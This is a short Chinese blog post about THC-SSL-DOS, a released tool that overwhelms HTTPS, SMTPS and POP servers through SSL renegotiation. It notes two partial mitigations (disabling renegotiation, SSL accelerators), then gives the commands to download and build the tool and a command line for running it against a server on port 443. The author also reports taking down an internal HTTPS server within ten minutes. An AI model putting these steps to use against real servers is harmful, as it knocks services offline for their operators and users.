用https的杯具了,德国黑客发布ssl DoS

德国黑客10月24日发布了攻击工具,详情请参考 http://www.thc.org/thc-ssl-dos/可以攻击到 https/smtps/pops 等等 ,目前还没有比较好的解决方法
No real solutions exists. The following steps can mitigate (but not solve) the problem:
1. Disable SSL-Renegotiation
2. Invest into SSL Accelerator
攻击软件安装使用
wget http://www.thc.org/thc-ssl-dos/thc-ssl-dos-1.4.tar.gz
tar xf thc-ssl-dos-1.4.tar.gz
cd thc-ssl-dos-1.4
./configure && make
使用
src/thc-ssl-dos –accept 192.168.0.1 443
我测试了下,内网环境,10分钟 服务器https 服务器失出反应

您可以选择一种方式赞助本站

支付宝转账赞助

支付宝扫一扫赞助

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen:

图片 表情